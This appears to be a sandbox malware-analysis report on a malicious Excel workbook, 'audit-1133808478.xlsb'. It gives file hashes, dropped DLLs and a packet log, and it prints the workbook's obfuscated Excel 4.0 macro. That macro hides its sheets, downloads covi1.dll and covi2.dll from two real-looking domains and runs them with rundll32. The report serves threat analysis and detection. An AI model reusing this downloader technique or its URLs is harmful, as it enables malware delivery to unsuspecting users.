SHA-512:	929C68CD0AEB59C605E3F9F1F534AF5DAE8FB7B2FA3D5A6760B23C45FD895FDE420E537F4D1601D6B2F89E2003D64E4AC4AB50D6402A7E67F065B3BC0B05B160
Malicious:	false
Preview:	.U.n.0....?......(..r.mzl.$...\K....I..V.6Pl.6.^.....v.7.k.'...k.U3c.8.v].~=\|.?...pJ..e[@v.x.n.....E;lY.R..9......pt...D...A.._.f.....Ku..l1..+.hRu...;%K.X.u._.j...h)...ON."..j.%(/.-A7."..=@...Q.c...(1d\|.3.....Ys.>....4....E.T...?.Yo0.}..~R..VP..~.Kn...>..... .L.5l$..8.X!..ubi..v/..0.H..vu..Mr.~9..<Q....Q.....3'...C...r$.Q.Sr. ..)]6).DC.x...W.........=....>.....o.#:T..Y.....}.:.K......."Lw.e...:...a?[.&..v.......n^...7.......PK..........!..:......m.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$audit-1133808478.xlsb Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtt:RJ1
MD5:	7AB76C81182111AC93ACF915CA8331D5
SHA1:	68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512:	A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious:	true
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\covi1.dll Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	504158
Entropy (8bit):	0.005987614520946852
Encrypted:	false
SSDEEP:	6:idq2Vg3F+X32QbRfzHil/FstlRMglyl7+Ekt+tC6X4y:e9GSGQFfiyWglylxCJ
MD5:	6EDC1D62B0DD8681DA9F35CC7320F44B
SHA1:	5BFD270A9B7A28A26A29C56C825D93CB84242DC1
SHA-256:	C74AC403D16F8A943741B28876CE112FEB57FAB8E9CA7AF2310F9BA46D6DE482
SHA-512:	A7F1014EAE1B8552521ABFCAFCBF23EA4962B424D927F168CB3072AAF685CA6A383E1754284BACF0C441DD10E557998F0749ECBB463A751BE3045A6DD232AF9B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................PE..L...<..`...........!.........^.......G.......................................`..............................................D...d........K..............................................................................D............................code...t........................... ..`.rdataf.............................@....rsrc....K.......L..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.955290238562611
TrID:	Excel Microsoft Office Binary workbook document (47504/1) 49.74% Excel Microsoft Office Open XML Format document (40004/1) 41.89% ZIP compressed archive (8000/1) 8.38%
File name:	audit-1133808478.xlsb
File size:	158780
MD5:	dbab0aba5ca271442b08d027f3ed391f
SHA1:	0c163e79f6bffea037d225a221d0a701db03c2d0
SHA256:	8987dac6f44dda69ceb74d59c276d38227e285c78f74e2d835283d1baa308176
SHA512:	fac502b2fc494ca941ab13c48e2805af74270f2dca90eda896d9b8537f440f383912e1ed2a92d492fe161936dea1ff4b71f8b4b9b4d2509ba714dbdbedcf2e02
SSDEEP:	3072:TtbU9VlUBWA6CFvA7bRCxAVIK2xVymd1xXP+Ph9vajtC1gBbZP6i:ZU3liWA6FsY2xVyWxf+QegBbd
File Content Preview:	PK..........!.^.~.............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74f0d0d2c6d6d0f4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "audit-1133808478.xlsb"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,J,,CAL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,shadiinfo.com/2DP6mQeg/pt.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,eg,,,,,,,,treasurechestcaribbean.com/pZ2Z61bqa/pt.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,svr32 -s ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

"=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=FORMULA('Doc2'!BL28,'Doc3'!AY16)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL29&'Doc2'!BL30,'Doc3'!AY10)",,,,,,,,,,,,"=FORMULA('Doc2'!BO36,'Doc3'!AY13)",,,,,,"=FORMULA('Doc2'!BM28&'Doc2'!BM29&'Doc2'!BM30&""B"",'Doc3'!AY12)",,,,,,"=FORMULA(before.5.35.61.sheet!BP47,'Doc3'!AY17)",,,,,,"=FORMULA('Doc2'!BO37,'Doc3'!AY14)",,,,,,"=FORMULA('Doc2'!BK39,'Doc3'!AY18)",,,,,,"=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL32&'Doc2'!BJ31&'Doc2'!BL31&'Doc2'!BL34&'Doc2'!BJ32&""eA"",'Doc3'!AY11)",,,,,,"=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY14&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.5.35.61.sheet!BO53&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW11)",,,,,,,,,,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=RIGHT(""LdecvsbgvrsxLxrgxgL"",1)",,,,,,,,,,,,"=FORMULA('Doc3'!AY18&'Doc2'!BG29&'Doc2'!BG36&'Doc2'!BG37&'Doc2'!BG38&'Doc2'!BG34&'Doc2'!BG35&'Doc2'!BG34&before.5.35.61.sheet!BO52&'Doc2'!BG33,'Doc3'!AW14)",,,,,,"=FORMULA('Doc3'!AY18&'Doc2'!BG29&'Doc2'!BG36&'Doc2'!BG37&'Doc2'!BG38&'Doc2'!BG34&'Doc2'!BG35&'Doc2'!BG34&before.5.35.61.sheet!BO53&'Doc2'!BG33,'Doc3'!AW15)",,,,,,,,,,,"=""..\covi1.dll""","=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY13&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.5.35.61.sheet!BO52&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW10)=SUMXMY2(452354,45245)",,,,,"=""..\covi2.dll""",,,,,,,,,,,,,,,,,,,=GOTO('Doc3'!AW2),,,,,,,,,,,,,,,,,,,,,,,"=LEFT(""LdecvsbgvrsxLxrgxg"",1)",

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 11:02:10.006829023 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.180213928 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.180315971 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.181369066 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.354885101 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.355159044 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.355202913 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.355241060 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.355247974 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.355278969 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.355285883 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.355292082 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.355326891 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.357153893 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.357340097 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.369098902 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.542629957 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.542787075 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.544142962 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.738284111 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738316059 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738333941 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738349915 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738373041 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738390923 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738411903 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738430977 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738441944 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.738447905 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738468885 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.738491058 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.738535881 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.913872004 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.913904905 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.913925886 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.913948059 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.913969040 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.913990974 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914014101 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914036989 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914057016 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914077997 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914078951 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.914098978 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914122105 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914141893 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914161921 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914226055 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914233923 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.914292097 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914318085 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.914380074 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.914381981 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914402962 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914458036 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.914469004 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914493084 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:10.914521933 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:10.914577961 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087445021 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087512970 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087539911 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087551117 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087579966 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087604046 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087605953 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087647915 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087678909 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087687969 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087692976 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087728024 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087745905 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087766886 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087774038 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087805986 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087824106 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087846994 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087855101 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087887049 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087929010 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087944984 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.087948084 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.087991953 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088018894 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088031054 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088047028 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088079929 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088088036 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088124037 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088134050 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088164091 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088182926 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088205099 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088223934 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088244915 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088257074 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088284016 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088314056 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088326931 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088340044 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088367939 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088385105 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088416100 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088417053 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088462114 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088466883 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088510990 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088700056 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088738918 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088768959 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088785887 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088865995 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088907003 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088937044 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088948965 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.088984966 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.088990927 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089000940 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089030981 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089045048 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089073896 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089080095 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089148045 CEST	49720	443	192.168.2.3	43.225.55.182
Jun 11, 2021 11:02:11.089152098 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089195013 CEST	443	49720	43.225.55.182	192.168.2.3
Jun 11, 2021 11:02:11.089212894 CEST	49720	443	192.168.2.3	43.225.55.182
